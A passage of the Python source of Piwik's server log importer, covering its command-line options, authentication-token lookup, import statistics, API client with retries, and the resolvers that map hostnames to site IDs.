AmazonCloudFrontFormat(), 'iis': IisFormat(), 's3': RegexFormat('s3', _S3_LOG_FORMAT), 'icecast2': RegexFormat('icecast2', _ICECAST2_LOG_FORMAT), 'nginx_json': JsonFormat('nginx_json'), } ## ## Code. ## class Configuration(object): """ Stores all the configuration options by reading sys.argv and parsing, if needed, the config.inc.php. It has 2 attributes: options and filenames. """ class Error(Exception): pass def _create_parser(self): """ Initialize and return the OptionParser instance. """ option_parser = optparse.OptionParser( usage='Usage: %prog [options] log_file [ log_file [...] ]', description="Import HTTP access logs to Piwik. " "log_file is the path to a server access log file (uncompressed, .gz, .bz2, or specify - to read from stdin). " " By default, the script will try to produce clean reports and will exclude bots, static files, discard http error and redirects, etc. This is customizable, see below.", epilog="About Piwik Server Log Analytics: http://piwik.org/log-analytics/ " " Found a bug? Please create a ticket in http://dev.piwik.org/ " " Please send your suggestions or successful user story to hello@piwik.org " ) option_parser.add_option( '--debug', '-d', dest='debug', action='count', default=0, help="Enable debug output (specify multiple times for more verbose)", ) option_parser.add_option( '--debug-tracker', dest='debug_tracker', action='store_true', default=False, help="Appends &debug=1 to tracker requests and prints out the result so the tracker can be debugged. If " "using the log importer results in errors with the tracker or improperly recorded visits, this option can " "be used to find out what the tracker is doing wrong. To see debug tracker output, you must also set the " "[Tracker] debug_on_demand INI config to 1 in your Piwik's config.ini.php file." ) option_parser.add_option( '--debug-request-limit', dest='debug_request_limit', type='int', default=None, help="Debug option that will exit after N requests are parsed. Can be used w/ --debug-tracker to limit the " "output of a large log file." ) option_parser.add_option( '--url', dest='piwik_url', help="REQUIRED Your Piwik server URL, eg. http://example.com/piwik/ or http://analytics.example.net", ) option_parser.add_option( '--dry-run', dest='dry_run', action='store_true', default=False, help="Perform a trial run with no tracking data being inserted into Piwik", ) option_parser.add_option( '--show-progress', dest='show_progress', action='store_true', default=os.isatty(sys.stdout.fileno()), help="Print a progress report X seconds (default: 1, use --show-progress-delay to override)" ) option_parser.add_option( '--show-progress-delay', dest='show_progress_delay', type='int', default=1, help="Change the default progress delay" ) option_parser.add_option( '--add-sites-new-hosts', dest='add_sites_new_hosts', action='store_true', default=False, help="When a hostname is found in the log file, but not matched to any website " "in Piwik, automatically create a new website in Piwik with this hostname to " "import the logs" ) option_parser.add_option( '--idsite', dest='site_id', help= ("When specified, " "data in the specified log files will be tracked for this Piwik site ID." " The script will not auto-detect the website based on the log line hostname (new websites will not be automatically created).") ) option_parser.add_option( '--idsite-fallback', dest='site_id_fallback', help="Default Piwik site ID to use if the hostname doesn't match any " "known Website's URL. New websites will not be automatically created. 
" " Used only if --add-sites-new-hosts or --idsite are not set", ) default_config = os.path.abspath( os.path.join(os.path.dirname(__file__), '../../config/config.ini.php'), ) option_parser.add_option( '--config', dest='config_file', default=default_config, help=( "This is only used when --login and --password is not used. " "Piwik will read the configuration file (default: %default) to " "fetch the Super User token_auth from the config file. " ) ) option_parser.add_option( '--login', dest='login', help="You can manually specify the Piwik Super User login" ) option_parser.add_option( '--password', dest='password', help="You can manually specify the Piwik Super User password" ) option_parser.add_option( '--token-auth', dest='piwik_token_auth', help="Piwik Super User token_auth, 32 characters hexadecimal string, found in Piwik > API", ) option_parser.add_option( '--hostname', dest='hostnames', action='append', default=[], help="Accepted hostname (requests with other hostnames will be excluded). " "Can be specified multiple times" ) option_parser.add_option( '--exclude-path', dest='excluded_paths', action='append', default=[], help="Any URL path matching this exclude-path will not be imported in Piwik. Can be specified multiple times" ) option_parser.add_option( '--exclude-path-from', dest='exclude_path_from', help="Each line from this file is a path to exclude (see: --exclude-path)" ) option_parser.add_option( '--include-path', dest='included_paths', action='append', default=[], help="Paths to include. Can be specified multiple times. If not specified, all paths are included." ) option_parser.add_option( '--include-path-from', dest='include_path_from', help="Each line from this file is a path to include" ) option_parser.add_option( '--useragent-exclude', dest='excluded_useragents', action='append', default=[], help="User agents to exclude (in addition to the standard excluded " "user agents). Can be specified multiple times", ) option_parser.add_option( '--enable-static', dest='enable_static', action='store_true', default=False, help="Track static files (images, css, js, ico, ttf, etc.)" ) option_parser.add_option( '--enable-bots', dest='enable_bots', action='store_true', default=False, help="Track bots. All bot visits will have a Custom Variable set with name='Bot' and value='$Bot_user_agent_here$'" ) option_parser.add_option( '--enable-http-errors', dest='enable_http_errors', action='store_true', default=False, help="Track HTTP errors (status code 4xx or 5xx)" ) option_parser.add_option( '--enable-http-redirects', dest='enable_http_redirects', action='store_true', default=False, help="Track HTTP redirects (status code 3xx except 304)" ) option_parser.add_option( '--enable-reverse-dns', dest='reverse_dns', action='store_true', default=False, help="Enable reverse DNS, used to generate the 'Providers' report in Piwik. " "Disabled by default, as it impacts performance" ) option_parser.add_option( '--strip-query-string', dest='strip_query_string', action='store_true', default=False, help="Strip the query string from the URL" ) option_parser.add_option( '--query-string-delimiter', dest='query_string_delimiter', default='?', help="The query string delimiter (default: %default)" ) option_parser.add_option( '--log-format-name', dest='log_format_name', default=None, help=("Access log format to detect (supported are: %s). " "When not specified, the log format will be autodetected by trying all supported log formats." 
% ', '.join(sorted(FORMATS.iterkeys()))) ) available_regex_groups = ['date', 'path', 'query_string', 'ip', 'user_agent', 'referrer', 'status', 'length', 'host', 'userid', 'generation_time_milli', 'event_action', 'event_name', 'timezone', 'session_time'] option_parser.add_option( '--log-format-regex', dest='log_format_regex', default=None, help="Regular expression used to parse log entries. Regexes must contain named groups for different log fields. " "Recognized fields include: %s. For an example of a supported Regex, see the source code of this file. " "Overrides --log-format-name." % (', '.join(available_regex_groups)) ) option_parser.add_option( '--log-date-format', dest='log_date_format', default=None, help="Format string used to parse dates. You can specify any format that can also be specified to " "the strptime python function." ) option_parser.add_option( '--log-hostname', dest='log_hostname', default=None, help="Force this hostname for a log format that doesn't include it. All hits " "will seem to come to this host" ) option_parser.add_option( '--skip', dest='skip', default=0, type='int', help="Skip the n first lines to start parsing/importing data at a given line for the specified log file", ) option_parser.add_option( '--recorders', dest='recorders', default=1, type='int', help="Number of simultaneous recorders (default: %default). " "It should be set to the number of CPU cores in your server. " "You can also experiment with higher values which may increase performance until a certain point", ) option_parser.add_option( '--recorder-max-payload-size', dest='recorder_max_payload_size', default=200, type='int', help="Maximum number of log entries to record in one tracking request (default: %default). " ) option_parser.add_option( '--replay-tracking', dest='replay_tracking', action='store_true', default=False, help="Replay piwik.php requests found in custom logs (only piwik.php requests expected). \nSee http://piwik.org/faq/how-to/faq_17033/" ) option_parser.add_option( '--replay-tracking-expected-tracker-file', dest='replay_tracking_expected_tracker_file', default='piwik.php', help="The expected suffix for tracking request paths. Only logs whose paths end with this will be imported. Defaults " "to 'piwik.php' so only requests to the piwik.php file will be imported." ) option_parser.add_option( '--output', dest='output', help="Redirect output (stdout and stderr) to the specified file" ) option_parser.add_option( '--encoding', dest='encoding', default='utf8', help="Log files encoding (default: %default)" ) option_parser.add_option( '--disable-bulk-tracking', dest='use_bulk_tracking', default=True, action='store_false', help="Disables use of bulk tracking so recorders record one hit at a time." ) option_parser.add_option( '--debug-force-one-hit-every-Ns', dest='force_one_action_interval', default=False, type='float', help="Debug option that will force each recorder to record one hit every N secs." ) option_parser.add_option( '--force-lowercase-path', dest='force_lowercase_path', default=False, action='store_true', help="Make URL path lowercase so paths with the same letters but different cases are " "treated the same." ) option_parser.add_option( '--enable-testmode', dest='enable_testmode', default=False, action='store_true', help="If set, it will try to get the token_auth from the piwik_tests directory" ) option_parser.add_option( '--download-extensions', dest='download_extensions', default=None, help="By default Piwik tracks as Downloads the most popular file extensions. 
If you set this parameter (format: pdf,doc,...) then files with an extension found in the list will be imported as Downloads, other file extensions downloads will be skipped." ) option_parser.add_option( '--add-download-extensions', dest='extra_download_extensions', default=None, help="Add extensions that should be treated as downloads. See --download-extensions for more info." ) option_parser.add_option( '--w3c-map-field', action='callback', callback=functools.partial(self._set_option_map, 'custom_w3c_fields'), type='string', help="Map a custom log entry field in your W3C log to a default one. Use this option to load custom log " "files that use the W3C extended log format such as those from the Advanced Logging W3C module. Used " "as, eg, --w3c-map-field my-date=date. Recognized default fields include: %s\n\n" "Formats that extend the W3C extended log format (like the cloudfront RTMP log format) may define more " "fields that can be mapped." % (', '.join(W3cExtendedFormat.fields.keys())) ) option_parser.add_option( '--w3c-time-taken-millisecs', action='store_true', default=False, dest='w3c_time_taken_in_millisecs', help="If set, interprets the time-taken W3C log field as a number of milliseconds. This must be set for importing" " IIS logs." ) option_parser.add_option( '--w3c-fields', dest='w3c_fields', default=None, help="Specify the '#Fields:' line for a log file in the W3C Extended log file format. Use this option if " "your log file doesn't contain the '#Fields:' line which is required for parsing. This option must be used " "in conjuction with --log-format-name=w3c_extended.\n" "Example: --w3c-fields='#Fields: date time c-ip ...'" ) option_parser.add_option( '--w3c-field-regex', action='callback', callback=functools.partial(self._set_option_map, 'w3c_field_regexes'), type='string', help="Specify a regex for a field in your W3C extended log file. You can use this option to parse fields the " "importer does not natively recognize and then use one of the --regex-group-to-XXX-cvar options to track " "the field in a custom variable. For example, specifying --w3c-field-regex=sc-win32-status=(?P<win32_status>\\S+) " "--regex-group-to-page-cvar=\"win32_status=Windows Status Code\" will track the sc-win32-status IIS field " "in the 'Windows Status Code' custom variable. Regexes must contain a named group." ) option_parser.add_option( '--title-category-delimiter', dest='title_category_delimiter', default='/', help="If --enable-http-errors is used, errors are shown in the page titles report. If you have " "changed General.action_title_category_delimiter in your Piwik configuration, you need to set this " "option to the same value in order to get a pretty page titles report." ) option_parser.add_option( '--dump-log-regex', dest='dump_log_regex', action='store_true', default=False, help="Prints out the regex string used to parse log lines and exists. Can be useful for using formats " "in newer versions of the script in older versions of the script. The output regex can be used with " "the --log-format-regex option." ) option_parser.add_option( '--ignore-groups', dest='regex_groups_to_ignore', default=None, help="Comma separated list of regex groups to ignore when parsing log lines. Can be used to, for example, " "disable normal user id tracking. See documentation for --log-format-regex for list of available " "regex groups." 
) option_parser.add_option( '--regex-group-to-visit-cvar', action='callback', callback=functools.partial(self._set_option_map, 'regex_group_to_visit_cvars_map'), type='string', help="Track an attribute through a custom variable with visit scope instead of through Piwik's normal " "approach. For example, to track usernames as a custom variable instead of through the uid tracking " "parameter, supply --regex-group-to-visit-cvar=\"userid=User Name\". This will track usernames in a " "custom variable named 'User Name'. The list of available regex groups can be found in the documentation " "for --log-format-regex (additional regex groups you may have defined " "in --log-format-regex can also be used)." ) option_parser.add_option( '--regex-group-to-page-cvar', action='callback', callback=functools.partial(self._set_option_map, 'regex_group_to_page_cvars_map'), type='string', help="Track an attribute through a custom variable with page scope instead of through Piwik's normal " "approach. For example, to track usernames as a custom variable instead of through the uid tracking " "parameter, supply --regex-group-to-page-cvar=\"userid=User Name\". This will track usernames in a " "custom variable named 'User Name'. The list of available regex groups can be found in the documentation " "for --log-format-regex (additional regex groups you may have defined " "in --log-format-regex can also be used)." ) option_parser.add_option( '--retry-max-attempts', dest='max_attempts', default=PIWIK_DEFAULT_MAX_ATTEMPTS, type='int', help="The maximum number of times to retry a failed tracking request." ) option_parser.add_option( '--retry-delay', dest='delay_after_failure', default=PIWIK_DEFAULT_DELAY_AFTER_FAILURE, type='int', help="The number of seconds to wait before retrying a failed tracking request." ) option_parser.add_option( '--request-timeout', dest='request_timeout', default=DEFAULT_SOCKET_TIMEOUT, type='int', help="The maximum number of seconds to wait before terminating an HTTP request to Piwik." ) return option_parser def _set_option_map(self, option_attr_name, option, opt_str, value, parser): """ Sets a key-value mapping in a dict that is built from command line options. Options that map string keys to string values (like --w3c-map-field) can set the callback to a bound partial of this method to handle the option. """ parts = value.split('=') if len(parts) != 2: fatal_error("Invalid %s option: '%s'" % (opt_str, value)) key, value = parts if not hasattr(parser.values, option_attr_name): setattr(parser.values, option_attr_name, {}) getattr(parser.values, option_attr_name)[key] = value def _parse_args(self, option_parser): """ Parse the command line args and create self.options and self.filenames. """ self.options, self.filenames = option_parser.parse_args(sys.argv[1:]) if self.options.output: sys.stdout = sys.stderr = open(self.options.output, 'a+', 0) if not self.filenames: print(option_parser.format_help()) sys.exit(1) # Configure logging before calling logging.{debug,info}. 
logging.basicConfig( format='%(asctime)s: [%(levelname)s] %(message)s', level=logging.DEBUG if self.options.debug >= 1 else logging.INFO, ) self.options.excluded_useragents = set([s.lower() for s in self.options.excluded_useragents]) if self.options.exclude_path_from: paths = [path.strip() for path in open(self.options.exclude_path_from).readlines()] self.options.excluded_paths.extend(path for path in paths if len(path) > 0) if self.options.excluded_paths: self.options.excluded_paths = set(self.options.excluded_paths) logging.debug('Excluded paths: %s', ' '.join(self.options.excluded_paths)) if self.options.include_path_from: paths = [path.strip() for path in open(self.options.include_path_from).readlines()] self.options.included_paths.extend(path for path in paths if len(path) > 0) if self.options.included_paths: self.options.included_paths = set(self.options.included_paths) logging.debug('Included paths: %s', ' '.join(self.options.included_paths)) if self.options.hostnames: logging.debug('Accepted hostnames: %s', ', '.join(self.options.hostnames)) else: logging.debug('Accepted hostnames: all') if self.options.log_format_regex: self.format = RegexFormat('custom', self.options.log_format_regex, self.options.log_date_format) elif self.options.log_format_name: try: self.format = FORMATS[self.options.log_format_name] except KeyError: fatal_error('invalid log format: %s' % self.options.log_format_name) else: self.format = None if not hasattr(self.options, 'custom_w3c_fields'): self.options.custom_w3c_fields = {} elif self.format is not None: # validate custom field mappings for custom_name, default_name in self.options.custom_w3c_fields.iteritems(): if default_name not in type(format).fields: fatal_error("custom W3C field mapping error: don't know how to parse and use the '%' field" % default_name) return if not hasattr(self.options, 'regex_group_to_visit_cvars_map'): self.options.regex_group_to_visit_cvars_map = {} if not hasattr(self.options, 'regex_group_to_page_cvars_map'): self.options.regex_group_to_page_cvars_map = {} if not hasattr(self.options, 'w3c_field_regexes'): self.options.w3c_field_regexes = {} else: # make sure each custom w3c field regex has a named group for field_name, field_regex in self.options.w3c_field_regexes.iteritems(): if '(?P<' not in field_regex: fatal_error("cannot find named group in custom w3c field regex '%s' for field '%s'" % (field_regex, field_name)) return if not self.options.piwik_url: fatal_error('no URL given for Piwik') if not (self.options.piwik_url.startswith('http://') or self.options.piwik_url.startswith('https://')): self.options.piwik_url = 'http://' + self.options.piwik_url logging.debug('Piwik URL is: %s', self.options.piwik_url) if not self.options.piwik_token_auth: try: self.options.piwik_token_auth = self._get_token_auth() except Piwik.Error, e: fatal_error(e) logging.debug('Authentication token token_auth is: %s', self.options.piwik_token_auth) if self.options.recorders < 1: self.options.recorders = 1 download_extensions = DOWNLOAD_EXTENSIONS if self.options.download_extensions: download_extensions = set(self.options.download_extensions.split(',')) if self.options.extra_download_extensions: download_extensions.update(self.options.extra_download_extensions.split(',')) self.options.download_extensions = download_extensions if self.options.regex_groups_to_ignore: self.options.regex_groups_to_ignore = set(self.options.regex_groups_to_ignore.split(',')) def __init__(self): self._parse_args(self._create_parser()) def _get_token_auth(self): """ If 
the token auth is not specified in the options, get it from Piwik. """ # Get superuser login/password from the options. logging.debug('No token-auth specified') if self.options.login and self.options.password: piwik_login = self.options.login piwik_password = hashlib.md5(self.options.password).hexdigest() logging.debug('Using credentials: (login = %s, password = %s)', piwik_login, piwik_password) try: api_result = piwik.call_api('UsersManager.getTokenAuth', userLogin=piwik_login, md5Password=piwik_password, _token_auth='', _url=self.options.piwik_url, ) except urllib2.URLError, e: fatal_error('error when fetching token_auth from the API: %s' % e) try: return api_result['value'] except KeyError: # Happens when the credentials are invalid. message = api_result.get('message') fatal_error( 'error fetching authentication token token_auth%s' % ( ': %s' % message if message else '') ) else: # Fallback to the given (or default) configuration file, then # get the token from the API. logging.debug( 'No credentials specified, reading them from "%s"', self.options.config_file, ) config_file = ConfigParser.RawConfigParser() success = len(config_file.read(self.options.config_file)) > 0 if not success: fatal_error( "the configuration file" + self.options.config_file + " could not be read. Please check permission. This file must be readable to get the authentication token" ) updatetokenfile = os.path.abspath( os.path.join(os.path.dirname(__file__), '../../misc/cron/updatetoken.php'), ) phpBinary = 'php' is_windows = sys.platform.startswith('win') if is_windows: try: processWin = subprocess.Popen('where php.exe', stdout=subprocess.PIPE, stderr=subprocess.PIPE) [stdout, stderr] = processWin.communicate() if processWin.returncode == 0: phpBinary = stdout.strip() else: fatal_error("We couldn't detect PHP. It might help to add your php.exe to the path or alternatively run the importer using the --login and --password option") except: fatal_error("We couldn't detect PHP. You can run the importer using the --login and --password option to fix this issue") command = [phpBinary, updatetokenfile] if self.options.enable_testmode: command.append('--testmode') hostname = urlparse.urlparse( self.options.piwik_url ).hostname command.append('--piwik-domain=' + hostname ) command = subprocess.list2cmdline(command) process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) [stdout, stderr] = process.communicate() if process.returncode != 0: fatal_error("`" + command + "` failed with error: " + stderr + ".\nReponse code was: " + str(process.returncode) + ". You can alternatively run the importer using the --login and --password option") filename = stdout credentials = open(filename, 'r').readline() credentials = credentials.split('\t') return credentials[1] def get_resolver(self): if self.options.site_id: logging.debug('Resolver: static') return StaticResolver(self.options.site_id) else: logging.debug('Resolver: dynamic') return DynamicResolver() class Statistics(object): """ Store statistics about parsed logs and recorded entries. Can optionally print statistics on standard output every second. """ class Counter(object): """ Simple integers cannot be used by multithreaded programs. See: http://stackoverflow.com/questions/6320107/are-python-ints-thread-safe """ def __init__(self): # itertools.count's implementation in C does not release the GIL and # therefore is thread-safe. 
self.counter = itertools.count(1) self.value = 0 def increment(self): self.value = self.counter.next() def advance(self, n): for i in range(n): self.increment() def __str__(self): return str(int(self.value)) def __init__(self): self.time_start = None self.time_stop = None self.piwik_sites = set() # sites ID self.piwik_sites_created = [] # (hostname, site ID) self.piwik_sites_ignored = set() # hostname self.count_lines_parsed = self.Counter() self.count_lines_recorded = self.Counter() # requests that the Piwik tracker considered invalid (or failed to track) self.invalid_lines = [] # Do not match the regexp. self.count_lines_invalid = self.Counter() # No site ID found by the resolver. self.count_lines_no_site = self.Counter() # Hostname filtered by config.options.hostnames self.count_lines_hostname_skipped = self.Counter() # Static files. self.count_lines_static = self.Counter() # Ignored user-agents. self.count_lines_skipped_user_agent = self.Counter() # Ignored HTTP erors. self.count_lines_skipped_http_errors = self.Counter() # Ignored HTTP redirects. self.count_lines_skipped_http_redirects = self.Counter() # Downloads self.count_lines_downloads = self.Counter() # Ignored downloads when --download-extensions is used self.count_lines_skipped_downloads = self.Counter() # Misc self.dates_recorded = set() self.monitor_stop = False def set_time_start(self): self.time_start = time.time() def set_time_stop(self): self.time_stop = time.time() def _compute_speed(self, value, start, end): delta_time = end - start if value == 0: return 0 if delta_time == 0: return 'very high!' else: return value / delta_time def _round_value(self, value, base=100): return round(value * base) / base def _indent_text(self, lines, level=1): """ Return an indented text. 'lines' can be a list of lines or a single line (as a string). One level of indentation is 4 spaces. """ prefix = ' ' * (4 * level) if isinstance(lines, basestring): return prefix + lines else: return '\n'.join( prefix + line for line in lines ) def print_summary(self): invalid_lines_summary = '' if self.invalid_lines: invalid_lines_summary = '''Invalid log lines ----------------- The following lines were not tracked by Piwik, either due to a malformed tracker request or error in the tracker: %s ''' % textwrap.fill(", ".join(self.invalid_lines), 80) print ''' %(invalid_lines)sLogs import summary ------------------- %(count_lines_recorded)d requests imported successfully %(count_lines_downloads)d requests were downloads %(total_lines_ignored)d requests ignored: %(count_lines_skipped_http_errors)d HTTP errors %(count_lines_skipped_http_redirects)d HTTP redirects %(count_lines_invalid)d invalid log lines %(count_lines_no_site)d requests did not match any known site %(count_lines_hostname_skipped)d requests did not match any --hostname %(count_lines_skipped_user_agent)d requests done by bots, search engines... %(count_lines_static)d requests to static resources (css, js, images, ico, ttf...) 
%(count_lines_skipped_downloads)d requests to file downloads did not match any --download-extensions Website import summary ---------------------- %(count_lines_recorded)d requests imported to %(total_sites)d sites %(total_sites_existing)d sites already existed %(total_sites_created)d sites were created: %(sites_created)s %(total_sites_ignored)d distinct hostnames did not match any existing site: %(sites_ignored)s %(sites_ignored_tips)s Performance summary ------------------- Total time: %(total_time)d seconds Requests imported per second: %(speed_recording)s requests per second Processing your log data ------------------------ In order for your logs to be processed by Piwik, you may need to run the following command: ./console core:archive --force-all-websites --force-all-periods=315576000 --force-date-last-n=1000 --url='%(url)s' ''' % { 'count_lines_recorded': self.count_lines_recorded.value, 'count_lines_downloads': self.count_lines_downloads.value, 'total_lines_ignored': sum([ self.count_lines_invalid.value, self.count_lines_skipped_user_agent.value, self.count_lines_skipped_http_errors.value, self.count_lines_skipped_http_redirects.value, self.count_lines_static.value, self.count_lines_skipped_downloads.value, self.count_lines_no_site.value, self.count_lines_hostname_skipped.value, ]), 'count_lines_invalid': self.count_lines_invalid.value, 'count_lines_skipped_user_agent': self.count_lines_skipped_user_agent.value, 'count_lines_skipped_http_errors': self.count_lines_skipped_http_errors.value, 'count_lines_skipped_http_redirects': self.count_lines_skipped_http_redirects.value, 'count_lines_static': self.count_lines_static.value, 'count_lines_skipped_downloads': self.count_lines_skipped_downloads.value, 'count_lines_no_site': self.count_lines_no_site.value, 'count_lines_hostname_skipped': self.count_lines_hostname_skipped.value, 'total_sites': len(self.piwik_sites), 'total_sites_existing': len(self.piwik_sites - set(site_id for hostname, site_id in self.piwik_sites_created)), 'total_sites_created': len(self.piwik_sites_created), 'sites_created': self._indent_text( ['%s (ID: %d)' % (hostname, site_id) for hostname, site_id in self.piwik_sites_created], level=3, ), 'total_sites_ignored': len(self.piwik_sites_ignored), 'sites_ignored': self._indent_text( self.piwik_sites_ignored, level=3, ), 'sites_ignored_tips': ''' TIPs: - if one of these hosts is an alias host for one of the websites in Piwik, you can add this host as an "Alias URL" in Settings > Websites. - use --add-sites-new-hosts if you wish to automatically create one website for each of these hosts in Piwik rather than discarding these requests. - use --idsite-fallback to force all these log lines with a new hostname to be recorded in a specific idsite (for example for troubleshooting/visualizing the data) - use --idsite to force all lines in the specified log files to be all recorded in the specified idsite - or you can also manually create a new Website in Piwik with the URL set to this hostname ''' if self.piwik_sites_ignored else '', 'total_time': self.time_stop - self.time_start, 'speed_recording': self._round_value(self._compute_speed( self.count_lines_recorded.value, self.time_start, self.time_stop, )), 'url': config.options.piwik_url, 'invalid_lines': invalid_lines_summary } ## ## The monitor is a thread that prints a short summary each second. 
## def _monitor(self): latest_total_recorded = 0 while not self.monitor_stop: current_total = stats.count_lines_recorded.value time_elapsed = time.time() - self.time_start print '%d lines parsed, %d lines recorded, %d records/sec (avg), %d records/sec (current)' % ( stats.count_lines_parsed.value, current_total, current_total / time_elapsed if time_elapsed != 0 else 0, (current_total - latest_total_recorded) / config.options.show_progress_delay, ) latest_total_recorded = current_total time.sleep(config.options.show_progress_delay) def start_monitor(self): t = threading.Thread(target=self._monitor) t.daemon = True t.start() def stop_monitor(self): self.monitor_stop = True class Piwik(object): """ Make requests to Piwik. """ class Error(Exception): def __init__(self, message, code = None): super(Exception, self).__init__(message) self.code = code class RedirectHandlerWithLogging(urllib2.HTTPRedirectHandler): """ Special implementation of HTTPRedirectHandler that logs redirects in debug mode to help users debug system issues. """ def redirect_request(self, req, fp, code, msg, hdrs, newurl): logging.debug("Request redirected (code: %s) to '%s'" % (code, newurl)) return urllib2.HTTPRedirectHandler.redirect_request(self, req, fp, code, msg, hdrs, newurl) @staticmethod def _call(path, args, headers=None, url=None, data=None): """ Make a request to the Piwik site. It is up to the caller to format arguments, to embed authentication, etc. """ if url is None: url = config.options.piwik_url headers = headers or {} if data is None: # If Content-Type isn't defined, PHP do not parse the request's body. headers['Content-type'] = 'application/x-www-form-urlencoded' data = urllib.urlencode(args) elif not isinstance(data, basestring) and headers['Content-type'] == 'application/json': data = json.dumps(data) if args: path = path + '?' + urllib.urlencode(args) headers['User-Agent'] = 'Piwik/LogImport' try: timeout = config.options.request_timeout except: timeout = None # the config global object may not be created at this point request = urllib2.Request(url + path, data, headers) opener = urllib2.build_opener(Piwik.RedirectHandlerWithLogging()) response = opener.open(request, timeout = timeout) result = response.read() response.close() return result @staticmethod def _call_api(method, **kwargs): """ Make a request to the Piwik API taking care of authentication, body formatting, etc. """ args = { 'module' : 'API', 'format' : 'json2', 'method' : method, } # token_auth, by default, is taken from config. token_auth = kwargs.pop('_token_auth', None) if token_auth is None: token_auth = config.options.piwik_token_auth if token_auth: args['token_auth'] = token_auth url = kwargs.pop('_url', None) if kwargs: args.update(kwargs) # Convert lists into appropriate format. # See: http://developer.piwik.org/api-reference/reporting-api#passing-an-array-of-data-as-a-parameter # Warning: we have to pass the parameters in order: foo[0], foo[1], foo[2] # and not foo[1], foo[0], foo[2] (it will break Piwik otherwise.) 
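        # Illustrative example (editorial note, not from the original source):
        # a keyword argument such as urls=['http://a.example', 'http://b.example']
        # is expanded by the loop below into the ordered pairs
        # ('urls[0]', 'http://a.example'), ('urls[1]', 'http://b.example'),
        # which keeps the index order Piwik requires.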
final_args = [] for key, value in args.iteritems(): if isinstance(value, (list, tuple)): for index, obj in enumerate(value): final_args.append(('%s[%d]' % (key, index), obj)) else: final_args.append((key, value)) res = Piwik._call('/', final_args, url=url) try: return json.loads(res) except ValueError: raise urllib2.URLError('Piwik returned an invalid response: ' + res) @staticmethod def _call_wrapper(func, expected_response, on_failure, *args, **kwargs): """ Try to make requests to Piwik at most PIWIK_FAILURE_MAX_RETRY times. """ errors = 0 while True: try: response = func(*args, **kwargs) if expected_response is not None and response != expected_response: if on_failure is not None: error_message = on_failure(response, kwargs.get('data')) else: error_message = "didn't receive the expected response. Response was %s " % response raise urllib2.URLError(error_message) return response except (urllib2.URLError, httplib.HTTPException, ValueError, socket.timeout), e: logging.info('Error when connecting to Piwik: %s', e) code = None if isinstance(e, urllib2.HTTPError): # See Python issue 13211. message = 'HTTP Error %s %s' % (e.code, e.msg) code = e.code elif isinstance(e, urllib2.URLError): message = e.reason else: message = str(e) # decorate message w/ HTTP response, if it can be retrieved if hasattr(e, 'read'): message = message + ", response: " + e.read() errors += 1 if errors == config.options.max_attempts: logging.info("Max number of attempts reached, server is unreachable!") raise Piwik.Error(message, code) else: logging.info("Retrying request, attempt number %d" % (errors + 1)) time.sleep(config.options.delay_after_failure) @classmethod def call(cls, path, args, expected_content=None, headers=None, data=None, on_failure=None): return cls._call_wrapper(cls._call, expected_content, on_failure, path, args, headers, data=data) @classmethod def call_api(cls, method, **kwargs): return cls._call_wrapper(cls._call_api, None, None, method, **kwargs) ## ## Resolvers. ## ## A resolver is a class that turns a hostname into a Piwik site ID. ## class StaticResolver(object): """ Always return the same site ID, specified in the configuration. """ def __init__(self, site_id): self.site_id = site_id # Go get the main URL site = piwik.call_api( 'SitesManager.getSiteFromId', idSite=self.site_id ) if site.get('result') == 'error': fatal_error( "cannot get the main URL of this site: %s" % site.get('message') ) self._main_url = site['main_url'] stats.piwik_sites.add(self.site_id) def resolve(self, hit): return (self.site_id, self._main_url) def check_format(self, format): pass class DynamicResolver(object): """ Use Piwik API to determine the site ID. """ _add_site_lock = threading.Lock() def __init__(self): self._cache = {} if config.options.replay_tracking: # get existing sites self._cache['sites'] = piwik.call_api('SitesManager.getAllSites') def _get_site_id_from_hit_host(self, hit): return piwik.call_api( 'SitesManager.getSitesIdFromSiteUrl', url=hit.host, ) def _add_site(self, hit): main_url = 'http://' + hit.host DynamicResolver._add_site_lock.acquire() try: # After we obtain the lock, make sure the site hasn't already been created. res = self._get_site_id_from_hit_host(hit) if res: return res[0]['idsite'] # The site doesn't exist. 
logging.debug('No Piwik site found for the hostname: %s', hit.host) if config.options.site_id_fallback is not None: logging.debug('Using default site for hostname: %s', hit.host) return config.options.site_id_fallback elif config.options.add_sites_new_hosts: if config.options.dry_run: # Let's just return a fake ID. return 0 logging.debug('Creating a Piwik site for hostname %s', hit.host) result = piwik.call_api( 'SitesManager.addSite', siteName=hit.host, urls=[main_url], ) if result.get('result') == 'error': logging.error("Couldn't create a Piwik site for host %s: %s", hit.host, result.get('message'), ) return None else: site_id = result['value'] stats.piwik_sites_created.append((hit.host, site_id)) return site_id else: # The site doesn't exist, we don't want to create new sites and # there's no default site ID. We thus have to ignore this hit. return None finally: DynamicResolver._add_site_lock.release() def _resolve(self, hit): res = self._get_site_id_from_hit_host(hit) if res: # The site already exists. site_id = res[0]['idsite'] else: site_id = self._add_site(hit) if site_id is not None: stats.piwik_sites.add(site_id) return site_id def _resolve_when_replay_tracking(self, hit): """ If parsed site ID found in the _cache['sites'] return site ID and main_url, otherwise return (None, None) tuple. """ site_id = hit.args['idsite'] if site_id in self._cache['sites']: stats.piwik_sites.add(site_id) return (site_id, self._cache['sites'][site_id]['main_url']) else: return (None, None) def _resolve_by_host(self, hit): """ Returns the site ID and site URL for a hit based on the hostname. """ try: site_id = self._cache[hit.host] except KeyError: logging.debug( 'Site ID for hostname %s not in cache', hit.host ) site_id = self._resolve(hit) logging.debug('Site ID for hostname %s: %s', hit.host, site_id) self._cache[hit.host] = site_id return (site_id, 'http://' + hit.host) def resolve(self, hit): """ Return the site ID from the cache if found, otherwise call _resolve. If replay_tracking option is enabled, call _resolve_when_replay_tracking. """ if config.options.replay_tracking: # We only consider requests with piwik.php which don't need host to be imported return self._resolve_when_replay_tracking(hit) else: return self._resolve_by_host(hit) def check_format(self, format): if config.options.replay_tracking: pass elif format.regex is not None and 'host' not in format.regex.groupindex and not config.options.log_hostname: fatal_error( "the selected log format doesn't include the hostname: you must " "specify the Piwik site ID with the --idsite argument" ) class Recorder(object): """ A Recorder fetches hits from the Queue and inserts them into Piwik using the API. """ recorders = [] def __init__(self): self.queue = Queue.Queue(maxsize=2) # if bulk tracking disabled, make sure we can store hits outside of the Queue if not config.options.use_bulk_tracking: self.unrecorded_hits = [] @classmethod def launch(cls, recorder_count): """ Launch a bunch of Recorder objects in a separate thread. """ for i in xrange(recorder_count): recorder = Recorder() cls.recorders.append(recorder) run = recorder._run_bulk if config.options.use_bulk_tracking else recorder._run_single t = threading.Thread(target=run) t.daemon 